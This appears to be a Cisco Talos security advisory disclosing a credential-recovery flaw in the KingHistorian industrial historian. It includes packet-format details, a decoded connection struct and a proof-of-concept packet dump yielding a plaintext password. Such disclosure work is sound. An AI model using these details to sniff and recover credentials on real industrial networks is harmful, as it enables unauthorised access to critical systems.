An information disclosure vulnerability exists in the User authentication functionality of WellinTech KingHistorian 35.01.00.05. A specially crafted network packet can lead to a disclosure of sensitive information. An attacker can sniff network traffic to leverage this vulnerability.

**SUMMARY**

An information disclosure vulnerability exists in the User authentication functionality of WellinTech KingHistorian 35.01.00.05. A specially crafted network packet can lead to a disclosure of sensitive information. An attacker can sniff network traffic to leverage this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

WellinTech KingHistorian 35.01.00.05

**PRODUCT URLS**

KingHistorian - https://www.wellintech.com/product/kinghistorian

**CVSSv3 SCORE**

7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

**CWE**

CWE-200 - Information Exposure

**DETAILS**

KingHistorian is a time-series database used for ingesting and analyzing industrial control system data. KingHistorian is designed to be high performance and highly reliable for process data.

The protocol used to communicate with XDBServer uses a mixture of ciphering and compression, which prevents plaintext strings from being sent directly. However, if an attacker captured an authentication packet, all the necessary information is included in the packet to recover the username and password.

Packets contain a 0x14-byte header starting with ‘SORB’ in ASCII as magic bytes. The rest of this header is uninteresting for this attack. Once the 0x14 bytes are skipped over, the packet’s first byte of data contains a flag to display if it is compressed, with the least-significant bit of the first byte representing the compression flag. If the packet is compressed, it is decompressed with quicklz . Once decompressed, the data can be recovered using length and value encoding to recover a structure as follows:

    pub struct BrkConnectionOption {
        username: String,
        ciphered_password: String,
        application_name: String,
        client_name: String,
        callback_proxy: String,
        collector_name: String,
        network_timeout: i32,
        connection_flags: i32,
        reserved_1: i32,
        reserved_2: i32,
        session_id: String,
        reserved_4: String,
        enc_key_1: i32,
        enc_key_2: i32,
        enc_key_3: i32,
        enc_key_4: i32,
        os_version: String,
        protocol_version: i32,
        system_general_1: i32,
        system_general_2: i32,
        system_general_3: i32,
        system_general_4: i32, 
    }
    

By combining the parts of the enc_key, it is possible to decipher the ciphered_password from the packet back into the plaintext form.

**Exploit Proof of Concept**

    Raw packet data : [83, 79, 82, 66, 2, 1, 70, 1, 19, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 82, 0, 0, 0, 0, 0, 71, 247, 1, 0, 0, 92, 2, 0, 0, 0, 0, 0, 128, 0, 86, 0, 0, 0, 8, 75, 0, 82, 0, 84, 0, 68, 0, 66, 0, 65, 0, 80, 0, 73, 0, 16, 66, 0, 114, 0, 107, 0, 83, 0, 10, 8, 130, 128, 101, 113, 32, 118, 99, 80, 67, 0, 111, 0, 110, 0, 110, 97, 80, 99, 0, 116, 0, 7, 226, 99, 119, 0, 85, 0, 115, 97, 80, 114, 0, 80, 50, 0, 55, 0, 4, 64, 85, 145, 53, 0, 34, 52, 48, 0, 48, 0, 57, 0, 54, 0, 49, 0, 56, 65, 32, 51, 49, 144, 49, 65, 16, 69, 49, 128, 67, 49, 96, 65, 49, 96, 51, 0, 67, 49, 128, 68, 0, 130, 85, 181, 210, 51, 65, 32, 54, 0, 52, 0, 70, 65, 48, 50, 60, 70, 65, 32, 57, 65, 48, 65, 49, 16, 57, 49, 112, 57, 49, 0, 56, 49, 48, 82, 60, 55, 49, 96, 68, 65, 96, 51, 0, 82, 60, 51, 51, 0, 106, 85, 75, 197, 48, 65, 96, 50, 65, 80, 54, 65, 16, 130, 65, 68, 65, 16, 66, 65, 64, 67, 49, 0, 49, 49, 96, 52, 49, 80, 34, 64, 55, 65, 64, 15, 75, 65, 64, 66, 81, 48, 121, 113, 48, 77, 0, 103, 113, 64, 130, 84, 69, 145, 83, 113, 64, 117, 0, 100, 0, 105, 97, 240, 11, 77, 81, 48, 69, 65, 64, 71, 65, 80, 87, 65, 144, 78, 49, 16, 48, 0, 78, 184, 86, 67, 65, 32, 75, 0, 45, 49, 64, 98, 0, 170, 90, 85, 145, 102, 49, 96, 53, 49, 96, 98, 49, 16, 45, 49, 80, 48, 97, 64, 97, 35, 208, 50, 58, 51, 33, 208, 97, 49, 64, 49, 49, 32, 45, 97, 64, 98, 49, 144, 54, 49, 32, 97, 0, 97, 49, 112, 54, 0, 40, 168, 168, 234, 99, 0, 98, 49, 128, 58, 113, 64, 99, 0, 112, 0, 32, 33, 208, 104, 33, 0, 49, 49, 144, 50, 0, 46, 49, 16, 54, 49, 128, 46, 49, 0, 46, 49, 112, 49, 33, 0, 45, 115, 0, 82, 53, 214, 6, 0, 160, 55, 49, 144, 2, 47, 116, 33, 0, 48, 1, 0, 1, 0, 2, 1, 0, 8, 0, 46, 1, 79, 64, 6, 0, 58, 92, 90, 127, 4, 12, 117, 19, 28, 39, 51, 77, 97, 144, 99, 69, 20, 85, 237, 113, 32, 111, 113, 48, 111, 0, 102, 113, 64, 32, 0, 87, 97, 144, 110, 97, 64, 111, 0, 119, 113, 48, 32, 81, 80, 110, 97, 176, 110, 97, 240, 119, 97, 224, 32, 65, 80, 66, 111, 116, 97, 144, 242, 104, 160, 170, 2, 134, 44, 0, 32, 0, 40, 49, 96, 46, 49, 96, 32, 97, 32, 117, 97, 144, 108, 97, 64, 32, 49, 144, 50, 49, 0, 48, 0, 41, 0, 0, 80, 3, 8, 0, 5, 0, 0, 0, 0, 0]
    
    BrkConnectionOption {
        username: "newUser",
        ciphered_password: "27527009618B391AE8C6A63C8D3B64FCC8FB9CA1979083E876DF3E83080F2E6A8BDABDC01645BD7D",
        application_name: "KDBSysMgtStudio",
        client_name: "MSEDGEWIN10",
        callback_proxy: "KRTDBCBK-4bf656b1-50da-4393-a412-db962aa76cb8:tcp -h 192.168.0.71 -p 5679 -t 0",
        collector_name: "",
        network_timeout: 0,
        connection_flags: 2,
        reserved_1: 0,
        reserved_2: 0,
        session_id: "",
        reserved_4: "",
        enc_key_1: 1078919470,
        enc_key_2: 1547304966,
        enc_key_3: 201621338,
        enc_key_4: 656151413,
        os_version: "Microsoft Windows Unknown Edition, (6.6 build 9200)",
        protocol_version: 217088,
        system_general_1: 0,
        system_general_2: 0,
        system_general_3: 0,
        system_general_4: 0,
        encryption_key: EncryptionKey {
            enc_1: 1078919470,
            enc_2: 1547304966,
            enc_3: 201621338,
            enc_4: 656151413,
        },
    }
    
    Password is : Thisismypassword
    

**TIMELINE**

2022-12-16 - Initial Vendor Contact  
2022-12-22 - Vendor Disclosure  
2022-12-22 - Initial Vendor Contact  
2023-03-17 - Vendor Patch Release  
2023-03-20 - Public Release

Discovered by Carl Hurd of Cisco Talos.

Tag

#cisco